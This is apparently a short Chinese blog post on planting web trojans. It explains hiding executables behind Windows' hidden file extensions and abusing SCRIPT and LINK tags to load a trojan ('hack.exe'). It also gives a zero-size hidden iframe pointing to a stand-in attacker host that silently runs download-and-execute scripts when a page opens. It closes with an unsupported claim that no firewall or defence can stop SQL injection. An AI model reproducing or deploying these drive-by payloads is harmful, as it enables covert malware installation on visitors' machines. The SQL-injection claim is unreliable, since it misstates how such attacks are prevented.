因為windows 預設值是不顯示副檔名,而恰好user的電腦又是設定為隱藏副檔名
利用SCRIPT標籤
LANGUAGE內容可以為除javascript,VBScript,JScript以外的字串,
漢字也可,SRC的內容為木馬程式地址,延伸名可以變通為PIF BAT COM SCR,同樣可以執行.
利用LINK標籤,代碼放在和之間<
link href="hack.exe" rel=stylesheet type=text/css><
iframe src="http://hack.er.net/hacker.htm" width="0" height="0"
frameborder="0"><
ifeame>
網站的首頁不會發生變化,但是,由於嵌入的網頁實際上已經打開了,
所以網頁上的下載木馬和執行木馬的腳本還是會隨著user首頁的打開而執行
sql injection:
一般網管人員為了達到保護網站安全,會利用架設防火牆,設計非軍事區(DMZ),
限制網站登入者的身分。但SQL Injection並非透過病毒及暴力攻擊手段,
對現階段任何防火牆或是防駭客系統而言,是無法防範的
沒有留言:
張貼留言